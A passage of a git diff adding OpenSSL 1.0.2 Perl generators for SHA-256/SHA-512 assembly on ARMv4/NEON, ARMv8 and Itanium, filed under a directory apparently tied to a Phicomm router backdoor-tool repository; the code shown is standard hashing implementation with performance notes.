+	vshr.u64	$d1,$e,#@Sigma1[1]		@ from NEON_00_15
+	veor		$s1,$t1				@ sigma0(X[i+1])
+	vshr.u64	$d2,$e,#@Sigma1[2]		@ from NEON_00_15
+	vadd.i64	@X[$i%8],$s1
+___
+	&NEON_00_15(2*$i,@_);
+}
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.align	4
+.LNEON:
+	dmb				@ errata #451034 on early Cortex A8
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+	sub	$Ktbl,r3,#672		@ K512
+	vldmia	$ctx,{$A-$H}		@ load context
+.Loop_neon:
+___
+for($i=0;$i<16;$i++)	{ &NEON_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	mov		$cnt,#4
+.L16_79_neon:
+	subs		$cnt,#1
+___
+for(;$i<32;$i++)	{ &NEON_16_79($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	bne		.L16_79_neon
+
+	 vadd.i64	$A,d30		@ h+=Maj from the past
+	vldmia		$ctx,{d24-d31}	@ load context to temp
+	vadd.i64	q8,q12		@ vectorized accumulate
+	vadd.i64	q9,q13
+	vadd.i64	q10,q14
+	vadd.i64	q11,q15
+	vstmia		$ctx,{$A-$H}	@ save context
+	teq		$inp,$len
+	sub		$Ktbl,#640	@ rewind K512
+	bne		.Loop_neon
+
+	vldmia	sp!,{d8-d15}		@ epilogue
+	ret				@ bx lr
+#endif
+___
+}
+$code.=<<___;
+.size	sha512_block_data_order,.-sha512_block_data_order
+.asciz	"SHA512 block transform for ARMv4/NEON, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+#if __ARM_MAX_ARCH__>=7
+.comm	OPENSSL_armcap_P,4,4
+#endif
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/\bbx\s+lr\b/.word\t0xe12fff1e/gm;	# make it possible to compile with -march=armv4
+$code =~ s/\bret\b/bx	lr/gm;
+print $code;
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv8.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv8.pl
new file mode 100644
index 0000000..bd7a0a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv8.pl
@@ -0,0 +1,420 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# SHA256/512 for ARMv8.
+#
+# Performance in cycles per processed byte and improvement coefficient
+# over code generated with "default" compiler:
+#
+#		SHA256-hw	SHA256(*)	SHA512
+# Apple A7	1.97		10.5 (+33%)	6.73 (-1%(**))
+# Cortex-A53	2.38		15.6 (+110%)	10.1 (+190%(***))
+# Cortex-A57	2.31		11.6 (+86%)	7.51 (+260%(***))
+# 
+# (*)	Software SHA256 results are of lesser relevance, presented
+#	mostly for informational purposes.
+# (**)	The result is a trade-off: it's possible to improve it by
+#	10% (or by 1 cycle per round), but at the cost of 20% loss
+#	on Cortex-A53 (or by 4 cycles per round).
+# (***)	Super-impressive coefficients over gcc-generated code are
+#	indication of some compiler "pathology", most notably code
+#	generated with -mgeneral-regs-only is significanty faster
+#	and lags behind assembly only by 50-90%.
+
+$flavour=shift;
+$output=shift;
+open STDOUT,">$output";
+
+if ($output =~ /512/) {
+	$BITS=512;
+	$SZ=8;
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=(1,  8, 7);
+	@sigma1=(19,61, 6);
+	$rounds=80;
+	$reg_t="x";
+} else {
+	$BITS=256;
+	$SZ=4;
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 7,18, 3);
+	@sigma1=(17,19,10);
+	$rounds=64;
+	$reg_t="w";
+}
+
+$func="sha${BITS}_block_data_order";
+
+($ctx,$inp,$num,$Ktbl)=map("x$_",(0..2,30));
+
+@X=map("$reg_t$_",(3..15,0..2));
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=map("$reg_t$_",(20..27));
+($t0,$t1,$t2,$t3)=map("$reg_t$_",(16,17,19,28));
+
+sub BODY_00_xx {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+my $j=($i+1)&15;
+my ($T0,$T1,$T2)=(@X[($i-8)&15],@X[($i-9)&15],@X[($i-10)&15]);
+   $T0=@X[$i+3] if ($i<11);
+
+$code.=<<___	if ($i<16);
+#ifndef	__ARMEB__
+	rev	@X[$i],@X[$i]			// $i
+#endif
+___
+$code.=<<___	if ($i<13 && ($i&1));
+	ldp	@X[$i+1],@X[$i+2],[$inp],#2*$SZ
+___
+$code.=<<___	if ($i==13);
+	ldp	@X[14],@X[15],[$inp]
+___
+$code.=<<___	if ($i>=14);
+	ldr	@X[($i-11)&15],[sp,#`$SZ*(($i-11)%4)`]
+___
+$code.=<<___	if ($i>0 && $i<16);
+	add	$a,$a,$t1			// h+=Sigma0(a)
+___
+$code.=<<___	if ($i>=11);
+	str	@X[($i-8)&15],[sp,#`$SZ*(($i-8)%4)`]
+___
+# While ARMv8 specifies merged rotate-n-logical operation such as
+# 'eor x,y,z,ror#n', it was found to negatively affect performance
+# on Apple A7. The reason seems to be that it requires even 'y' to
+# be available earlier. This means that such merged instruction is
+# not necessarily best choice on critical path... On the other hand
+# Cortex-A5x handles merged instructions much better than disjoint
+# rotate and logical... See (**) footnote above.
+$code.=<<___	if ($i<15);
+	ror	$t0,$e,#$Sigma1[0]
+	add	$h,$h,$t2			// h+=K[i]
+	eor	$T0,$e,$e,ror#`$Sigma1[2]-$Sigma1[1]`
+	and	$t1,$f,$e
+	bic	$t2,$g,$e
+	add	$h,$h,@X[$i&15]			// h+=X[i]
+	orr	$t1,$t1,$t2			// Ch(e,f,g)
+	eor	$t2,$a,$b			// a^b, b^c in next round
+	eor	$t0,$t0,$T0,ror#$Sigma1[1]	// Sigma1(e)
+	ror	$T0,$a,#$Sigma0[0]
+	add	$h,$h,$t1			// h+=Ch(e,f,g)
+	eor	$t1,$a,$a,ror#`$Sigma0[2]-$Sigma0[1]`
+	add	$h,$h,$t0			// h+=Sigma1(e)
+	and	$t3,$t3,$t2			// (b^c)&=(a^b)
+	add	$d,$d,$h			// d+=h
+	eor	$t3,$t3,$b			// Maj(a,b,c)
+	eor	$t1,$T0,$t1,ror#$Sigma0[1]	// Sigma0(a)
+	add	$h,$h,$t3			// h+=Maj(a,b,c)
+	ldr	$t3,[$Ktbl],#$SZ		// *K++, $t2 in next round
+	//add	$h,$h,$t1			// h+=Sigma0(a)
+___
+$code.=<<___	if ($i>=15);
+	ror	$t0,$e,#$Sigma1[0]
+	add	$h,$h,$t2			// h+=K[i]
+	ror	$T1,@X[($j+1)&15],#$sigma0[0]
+	and	$t1,$f,$e
+	ror	$T2,@X[($j+14)&15],#$sigma1[0]
+	bic	$t2,$g,$e
+	ror	$T0,$a,#$Sigma0[0]
+	add	$h,$h,@X[$i&15]			// h+=X[i]
+	eor	$t0,$t0,$e,ror#$Sigma1[1]
+	eor	$T1,$T1,@X[($j+1)&15],ror#$sigma0[1]
+	orr	$t1,$t1,$t2			// Ch(e,f,g)
+	eor	$t2,$a,$b			// a^b, b^c in next round
+	eor	$t0,$t0,$e,ror#$Sigma1[2]	// Sigma1(e)
+	eor	$T0,$T0,$a,ror#$Sigma0[1]
+	add	$h,$h,$t1			// h+=Ch(e,f,g)
+	and	$t3,$t3,$t2			// (b^c)&=(a^b)
+	eor	$T2,$T2,@X[($j+14)&15],ror#$sigma1[1]
+	eor	$T1,$T1,@X[($j+1)&15],lsr#$sigma0[2]	// sigma0(X[i+1])
+	add	$h,$h,$t0			// h+=Sigma1(e)
+	eor	$t3,$t3,$b			// Maj(a,b,c)
+	eor	$t1,$T0,$a,ror#$Sigma0[2]	// Sigma0(a)
+	eor	$T2,$T2,@X[($j+14)&15],lsr#$sigma1[2]	// sigma1(X[i+14])
+	add	@X[$j],@X[$j],@X[($j+9)&15]
+	add	$d,$d,$h			// d+=h
+	add	$h,$h,$t3			// h+=Maj(a,b,c)
+	ldr	$t3,[$Ktbl],#$SZ		// *K++, $t2 in next round
+	add	@X[$j],@X[$j],$T1
+	add	$h,$h,$t1			// h+=Sigma0(a)
+	add	@X[$j],@X[$j],$T2
+___
+	($t2,$t3)=($t3,$t2);
+}
+
+$code.=<<___;
+#include "arm_arch.h"
+
+.text
+
+.globl	$func
+.type	$func,%function
+.align	6
+$func:
+___
+$code.=<<___	if ($SZ==4);
+	ldr	x16,.LOPENSSL_armcap_P
+	adr	x17,.LOPENSSL_armcap_P
+	add	x16,x16,x17
+	ldr	w16,[x16]
+	tst	w16,#ARMV8_SHA256
+	b.ne	.Lv8_entry
+___
+$code.=<<___;
+	stp	x29,x30,[sp,#-128]!
+	add	x29,sp,#0
+
+	stp	x19,x20,[sp,#16]
+	stp	x21,x22,[sp,#32]
+	stp	x23,x24,[sp,#48]
+	stp	x25,x26,[sp,#64]
+	stp	x27,x28,[sp,#80]
+	sub	sp,sp,#4*$SZ
+
+	ldp	$A,$B,[$ctx]				// load context
+	ldp	$C,$D,[$ctx,#2*$SZ]
+	ldp	$E,$F,[$ctx,#4*$SZ]
+	add	$num,$inp,$num,lsl#`log(16*$SZ)/log(2)`	// end of input
+	ldp	$G,$H,[$ctx,#6*$SZ]
+	adr	$Ktbl,K$BITS
+	stp	$ctx,$num,[x29,#96]
+
+.Loop:
+	ldp	@X[0],@X[1],[$inp],#2*$SZ
+	ldr	$t2,[$Ktbl],#$SZ			// *K++
+	eor	$t3,$B,$C				// magic seed
+	str	$inp,[x29,#112]
+___
+for ($i=0;$i<16;$i++)	{ &BODY_00_xx($i,@V); unshift(@V,pop(@V)); }
+$code.=".Loop_16_xx:\n";
+for (;$i<32;$i++)	{ &BODY_00_xx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	cbnz	$t2,.Loop_16_xx
+
+	ldp	$ctx,$num,[x29,#96]
+	ldr	$inp,[x29,#112]
+	sub	$Ktbl,$Ktbl,#`$SZ*($rounds+1)`		// rewind
+
+	ldp	@X[0],@X[1],[$ctx]
+	ldp	@X[2],@X[3],[$ctx,#2*$SZ]
+	add	$inp,$inp,#14*$SZ			// advance input pointer
+	ldp	@X[4],@X[5],[$ctx,#4*$SZ]
+	add	$A,$A,@X[0]
+	ldp	@X[6],@X[7],[$ctx,#6*$SZ]
+	add	$B,$B,@X[1]
+	add	$C,$C,@X[2]
+	add	$D,$D,@X[3]
+	stp	$A,$B,[$ctx]
+	add	$E,$E,@X[4]
+	add	$F,$F,@X[5]
+	stp	$C,$D,[$ctx,#2*$SZ]
+	add	$G,$G,@X[6]
+	add	$H,$H,@X[7]
+	cmp	$inp,$num
+	stp	$E,$F,[$ctx,#4*$SZ]
+	stp	$G,$H,[$ctx,#6*$SZ]
+	b.ne	.Loop
+
+	ldp	x19,x20,[x29,#16]
+	add	sp,sp,#4*$SZ
+	ldp	x21,x22,[x29,#32]
+	ldp	x23,x24,[x29,#48]
+	ldp	x25,x26,[x29,#64]
+	ldp	x27,x28,[x29,#80]
+	ldp	x29,x30,[sp],#128
+	ret
+.size	$func,.-$func
+
+.align	6
+.type	K$BITS,%object
+K$BITS:
+___
+$code.=<<___ if ($SZ==8);
+	.quad	0x428a2f98d728ae22,0x7137449123ef65cd
+	.quad	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	.quad	0x3956c25bf348b538,0x59f111f1b605d019
+	.quad	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	.quad	0xd807aa98a3030242,0x12835b0145706fbe
+	.quad	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
+	.quad	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	.quad	0x9bdc06a725c71235,0xc19bf174cf692694
+	.quad	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	.quad	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	.quad	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	.quad	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	.quad	0x983e5152ee66dfab,0xa831c66d2db43210
+	.quad	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	.quad	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	.quad	0x06ca6351e003826f,0x142929670a0e6e70
+	.quad	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	.quad	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	.quad	0x650a73548baf63de,0x766a0abb3c77b2a8
+	.quad	0x81c2c92e47edaee6,0x92722c851482353b
+	.quad	0xa2bfe8a14cf10364,0xa81a664bbc423001
+	.quad	0xc24b8b70d0f89791,0xc76c51a30654be30
+	.quad	0xd192e819d6ef5218,0xd69906245565a910
+	.quad	0xf40e35855771202a,0x106aa07032bbd1b8
+	.quad	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	.quad	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	.quad	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	.quad	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	.quad	0x748f82ee5defb2fc,0x78a5636f43172f60
+	.quad	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	.quad	0x90befffa23631e28,0xa4506cebde82bde9
+	.quad	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	.quad	0xca273eceea26619c,0xd186b8c721c0c207
+	.quad	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	.quad	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	.quad	0x113f9804bef90dae,0x1b710b35131c471b
+	.quad	0x28db77f523047d84,0x32caab7b40c72493
+	.quad	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	.quad	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	.quad	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+	.quad	0	// terminator
+___
+$code.=<<___ if ($SZ==4);
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+	.long	0	//terminator
+___
+$code.=<<___;
+.size	K$BITS,.-K$BITS
+.align	3
+.LOPENSSL_armcap_P:
+	.quad	OPENSSL_armcap_P-.
+.asciz	"SHA$BITS block transform for ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+___
+
+if ($SZ==4) {
+my $Ktbl="x3";
+
+my ($ABCD,$EFGH,$abcd)=map("v$_.16b",(0..2));
+my @MSG=map("v$_.16b",(4..7));
+my ($W0,$W1)=("v16.4s","v17.4s");
+my ($ABCD_SAVE,$EFGH_SAVE)=("v18.16b","v19.16b");
+
+$code.=<<___;
+.type	sha256_block_armv8,%function
+.align	6
+sha256_block_armv8:
+.Lv8_entry:
+	stp		x29,x30,[sp,#-16]!
+	add		x29,sp,#0
+
+	ld1.32		{$ABCD,$EFGH},[$ctx]
+	adr		$Ktbl,K256
+
+.Loop_hw:
+	ld1		{@MSG[0]-@MSG[3]},[$inp],#64
+	sub		$num,$num,#1
+	ld1.32		{$W0},[$Ktbl],#16
+	rev32		@MSG[0],@MSG[0]
+	rev32		@MSG[1],@MSG[1]
+	rev32		@MSG[2],@MSG[2]
+	rev32		@MSG[3],@MSG[3]
+	orr		$ABCD_SAVE,$ABCD,$ABCD		// offload
+	orr		$EFGH_SAVE,$EFGH,$EFGH
+___
+for($i=0;$i<12;$i++) {
+$code.=<<___;
+	ld1.32		{$W1},[$Ktbl],#16
+	add.i32		$W0,$W0,@MSG[0]
+	sha256su0	@MSG[0],@MSG[1]
+	orr		$abcd,$ABCD,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+	sha256su1	@MSG[0],@MSG[2],@MSG[3]
+___
+	($W0,$W1)=($W1,$W0);	push(@MSG,shift(@MSG));
+}
+$code.=<<___;
+	ld1.32		{$W1},[$Ktbl],#16
+	add.i32		$W0,$W0,@MSG[0]
+	orr		$abcd,$ABCD,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+
+	ld1.32		{$W0},[$Ktbl],#16
+	add.i32		$W1,$W1,@MSG[1]
+	orr		$abcd,$ABCD,$ABCD
+	sha256h		$ABCD,$EFGH,$W1
+	sha256h2	$EFGH,$abcd,$W1
+
+	ld1.32		{$W1},[$Ktbl]
+	add.i32		$W0,$W0,@MSG[2]
+	sub		$Ktbl,$Ktbl,#$rounds*$SZ-16	// rewind
+	orr		$abcd,$ABCD,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+
+	add.i32		$W1,$W1,@MSG[3]
+	orr		$abcd,$ABCD,$ABCD
+	sha256h		$ABCD,$EFGH,$W1
+	sha256h2	$EFGH,$abcd,$W1
+
+	add.i32		$ABCD,$ABCD,$ABCD_SAVE
+	add.i32		$EFGH,$EFGH,$EFGH_SAVE
+
+	cbnz		$num,.Loop_hw
+
+	st1.32		{$ABCD,$EFGH},[$ctx]
+
+	ldr		x29,[sp],#16
+	ret
+.size	sha256_block_armv8,.-sha256_block_armv8
+___
+}
+
+$code.=<<___;
+.comm	OPENSSL_armcap_P,4,4
+___
+
+{   my  %opcode = (
+	"sha256h"	=> 0x5e004000,	"sha256h2"	=> 0x5e005000,
+	"sha256su0"	=> 0x5e282800,	"sha256su1"	=> 0x5e006000	);
+
+    sub unsha256 {
+	my ($mnemonic,$arg)=@_;
+
+	$arg =~ m/[qv]([0-9]+)[^,]*,\s*[qv]([0-9]+)[^,]*(?:,\s*[qv]([0-9]+))?/o
+	&&
+	sprintf ".inst\t0x%08x\t//%s %s",
+			$opcode{$mnemonic}|$1|($2<<5)|($3<<16),
+			$mnemonic,$arg;
+    }
+}
+
+foreach(split("\n",$code)) {
+
+	s/\`([^\`]*)\`/eval($1)/geo;
+
+	s/\b(sha256\w+)\s+([qv].*)/unsha256($1,$2)/geo;
+
+	s/\.\w?32\b//o		and s/\.16b/\.4s/go;
+	m/(ld|st)1[^\[]+\[0\]/o	and s/\.4s/\.s/go;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ia64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ia64.pl
new file mode 100755
index 0000000..59f889a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ia64.pl
@@ -0,0 +1,685 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# SHA256/512_Transform for Itanium.
+#
+# sha512_block runs in 1003 cycles on Itanium 2, which is almost 50%
+# faster than gcc and >60%(!) faster than code generated by HP-UX
+# compiler (yes, HP-UX is generating slower code, because unlike gcc,
+# it failed to deploy "shift right pair," 'shrp' instruction, which
+# substitutes for 64-bit rotate).
+#
+# 924 cycles long sha256_block outperforms gcc by over factor of 2(!)
+# and HP-UX compiler - by >40% (yes, gcc won sha512_block, but lost
+# this one big time). Note that "formally" 924 is about 100 cycles
+# too much. I mean it's 64 32-bit rounds vs. 80 virtually identical
+# 64-bit ones and 1003*64/80 gives 802. Extra cycles, 2 per round,
+# are spent on extra work to provide for 32-bit rotations. 32-bit
+# rotations are still handled by 'shrp' instruction and for this
+# reason lower 32 bits are deposited to upper half of 64-bit register
+# prior 'shrp' issue. And in order to minimize the amount of such
+# operations, X[16] values are *maintained* with copies of lower
+# halves in upper halves, which is why you'll spot such instructions
+# as custom 'mux2', "parallel 32-bit add," 'padd4' and "parallel
+# 32-bit unsigned right shift," 'pshr4.u' instructions here.
+#
+# Rules of engagement.
+#
+# There is only one integer shifter meaning that if I have two rotate,
+# deposit or extract instructions in adjacent bundles, they shall
+# split [at run-time if they have to]. But note that variable and
+# parallel shifts are performed by multi-media ALU and *are* pairable
+# with rotates [and alike]. On the backside MMALU is rather slow: it
+# takes 2 extra cycles before the result of integer operation is
+# available *to* MMALU and 2(*) extra cycles before the result of MM
+# operation is available "back" *to* integer ALU, not to mention that
+# MMALU itself has 2 cycles latency. However! I explicitly scheduled
+# these MM instructions to avoid MM stalls, so that all these extra
+# latencies get "hidden" in instruction-level parallelism.
+#
+# (*) 2 cycles on Itanium 1 and 1 cycle on Itanium 2. But I schedule
+#     for 2 in order to provide for best *overall* performance,
+#     because on Itanium 1 stall on MM result is accompanied by
+#     pipeline flush, which takes 6 cycles:-(
+#
+# June 2012
+#
+# Improve performance by 15-20%. Note about "rules of engagement"
+# above. Contemporary cores are equipped with additional shifter,
+# so that they should perform even better than below, presumably
+# by ~10%.
+#
+######################################################################
+# Current performance in cycles per processed byte for Itanium 2
+# pre-9000 series [little-endian] system:
+#
+# SHA1(*)	5.7
+# SHA256	12.6
+# SHA512	6.7
+#
+# (*) SHA1 result is presented purely for reference purposes.
+#
+# To generate code, pass the file name with either 256 or 512 in its
+# name and compiler flags.
+
+$output=shift;
+
+if ($output =~ /512.*\.[s|asm]/) {
+	$SZ=8;
+	$BITS=8*$SZ;
+	$LDW="ld8";
+	$STW="st8";
+	$ADD="add";
+	$SHRU="shr.u";
+	$TABLE="K512";
+	$func="sha512_block_data_order";
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=(1,  8, 7);
+	@sigma1=(19,61, 6);
+	$rounds=80;
+} elsif ($output =~ /256.*\.[s|asm]/) {
+	$SZ=4;
+	$BITS=8*$SZ;
+	$LDW="ld4";
+	$STW="st4";
+	$ADD="padd4";
+	$SHRU="pshr4.u";
+	$TABLE="K256";
+	$func="sha256_block_data_order";
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 7,18, 3);
+	@sigma1=(17,19,10);
+	$rounds=64;
+} else { die "nonsense $output"; }
+
+open STDOUT,">$output" || die "can't open $output: $!";
+
+if ($^O eq "hpux") {
+    $ADDP="addp4";
+    for (@ARGV) { $ADDP="add" if (/[\+DD|\-mlp]64/); }
+} else { $ADDP="add"; }
+for (@ARGV)  {	$big_endian=1 if (/\-DB_ENDIAN/);
+		$big_endian=0 if (/\-DL_ENDIAN/);  }
+if (!defined($big_endian))
+             {	$big_endian=(unpack('L',pack('N',1))==1);  }
+
+$code=<<___;
+.ident  \"$output, version 2.0\"
+.ident  \"IA-64 ISA artwork by Andy Polyakov <appro\@openssl.org>\"
+.explicit
+.text
+
+pfssave=r2;
+lcsave=r3;
+prsave=r14;
+K=r15;
+A_=r16; B_=r17; C_=r18; D_=r19;
+E_=r20; F_=r21; G_=r22; H_=r23;
+T1=r24;	T2=r25;
+s0=r26;	s1=r27;	t0=r28;	t1=r29;
+Ktbl=r30;
+ctx=r31;	// 1st arg
+input=r56;	// 2nd arg
+num=r57;	// 3rd arg
+sgm0=r58;	sgm1=r59;	// small constants
+
+// void $func (SHA_CTX *ctx, const void *in,size_t num[,int host])
+.global	$func#
+.proc	$func#
+.align	32
+.skip	16
+$func:
+	.prologue
+	.save	ar.pfs,pfssave
+{ .mmi;	alloc	pfssave=ar.pfs,3,25,0,24
+	$ADDP	ctx=0,r32		// 1st arg
+	.save	ar.lc,lcsave
+	mov	lcsave=ar.lc	}
+{ .mmi;	$ADDP	input=0,r33		// 2nd arg
+	mov	num=r34			// 3rd arg
+	.save	pr,prsave
+	mov	prsave=pr	};;
+
+	.body
+{ .mib;	add	r8=0*$SZ,ctx
+	add	r9=1*$SZ,ctx	}
+{ .mib;	add	r10=2*$SZ,ctx
+	add	r11=3*$SZ,ctx	};;
+
+// load A-H
+.Lpic_point:
+{ .mmi;	$LDW	A_=[r8],4*$SZ
+	$LDW	B_=[r9],4*$SZ
+	mov	Ktbl=ip		}
+{ .mmi;	$LDW	C_=[r10],4*$SZ
+	$LDW	D_=[r11],4*$SZ
+	mov	sgm0=$sigma0[2]	};;
+{ .mmi;	$LDW	E_=[r8]
+	$LDW	F_=[r9]
+	add	Ktbl=($TABLE#-.Lpic_point),Ktbl		}
+{ .mmi;	$LDW	G_=[r10]
+	$LDW	H_=[r11]
+	cmp.ne	p0,p16=0,r0	};;
+___
+$code.=<<___ if ($BITS==64);
+{ .mii;	and	r8=7,input
+	and	input=~7,input;;
+	cmp.eq	p9,p0=1,r8	}
+{ .mmi;	cmp.eq	p10,p0=2,r8
+	cmp.eq	p11,p0=3,r8
+	cmp.eq	p12,p0=4,r8	}
+{ .mmi;	cmp.eq	p13,p0=5,r8
+	cmp.eq	p14,p0=6,r8
+	cmp.eq	p15,p0=7,r8	};;
+___
+$code.=<<___;
+.L_outer:
+.rotr	R[8],X[16]
+A=R[0]; B=R[1]; C=R[2]; D=R[3]; E=R[4]; F=R[5]; G=R[6]; H=R[7]
+{ .mmi;	ld1	X[15]=[input],$SZ		// eliminated in sha512
+	mov	A=A_
+	mov	ar.lc=14	}
+{ .mmi;	mov	B=B_
+	mov	C=C_
+	mov	D=D_		}
+{ .mmi;	mov	E=E_
+	mov	F=F_
+	mov	ar.ec=2		};;
+{ .mmi;	mov	G=G_
+	mov	H=H_
+	mov	sgm1=$sigma1[2]	}
+{ .mib;	mov	r8=0
+	add	r9=1-$SZ,input
+	brp.loop.imp	.L_first16,.L_first16_end-16	};;
+___
+$t0="A", $t1="E", $code.=<<___ if ($BITS==64);
+// in sha512 case I load whole X[16] at once and take care of alignment...
+{ .mmi;	add	r8=1*$SZ,input
+	add	r9=2*$SZ,input
+	add	r10=3*$SZ,input		};;
+{ .mmb;	$LDW	X[15]=[input],4*$SZ
+	$LDW	X[14]=[r8],4*$SZ
+(p9)	br.cond.dpnt.many	.L1byte	};;
+{ .mmb;	$LDW	X[13]=[r9],4*$SZ
+	$LDW	X[12]=[r10],4*$SZ
+(p10)	br.cond.dpnt.many	.L2byte	};;
+{ .mmb;	$LDW	X[11]=[input],4*$SZ
+	$LDW	X[10]=[r8],4*$SZ
+(p11)	br.cond.dpnt.many	.L3byte	};;
+{ .mmb;	$LDW	X[ 9]=[r9],4*$SZ
+	$LDW	X[ 8]=[r10],4*$SZ
+(p12)	br.cond.dpnt.many	.L4byte	};;
+{ .mmb;	$LDW	X[ 7]=[input],4*$SZ
+	$LDW	X[ 6]=[r8],4*$SZ
+(p13)	br.cond.dpnt.many	.L5byte	};;
+{ .mmb;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+(p14)	br.cond.dpnt.many	.L6byte	};;
+{ .mmb;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+(p15)	br.cond.dpnt.many	.L7byte	};;
+{ .mmb;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ	}
+{ .mib;	mov	r8=0
+	mux1	X[15]=X[15],\@rev		// eliminated on big-endian
+	br.many	.L_first16		};;
+.L1byte:
+{ .mmi;	$LDW	X[13]=[r9],4*$SZ
+	$LDW	X[12]=[r10],4*$SZ
+	shrp	X[15]=X[15],X[14],56	};;
+{ .mmi;	$LDW	X[11]=[input],4*$SZ
+	$LDW	X[10]=[r8],4*$SZ
+	shrp	X[14]=X[14],X[13],56	}
+{ .mmi;	$LDW	X[ 9]=[r9],4*$SZ
+	$LDW	X[ 8]=[r10],4*$SZ
+	shrp	X[13]=X[13],X[12],56	};;
+{ .mmi;	$LDW	X[ 7]=[input],4*$SZ
+	$LDW	X[ 6]=[r8],4*$SZ
+	shrp	X[12]=X[12],X[11],56	}
+{ .mmi;	$LDW	X[ 5]=[r9],4*$SZ
+	$LDW	X[ 4]=[r10],4*$SZ
+	shrp	X[11]=X[11],X[10],56	};;
+{ .mmi;	$LDW	X[ 3]=[input],4*$SZ
+	$LDW	X[ 2]=[r8],4*$SZ
+	shrp	X[10]=X[10],X[ 9],56	}
+{ .mmi;	$LDW	X[ 1]=[r9],4*$SZ
+	$LDW	X[ 0]=[r10],4*$SZ
+	shrp	X[ 9]=X[ 9],X[ 8],56	};;
+{ .mii;	$LDW	T1=[input]
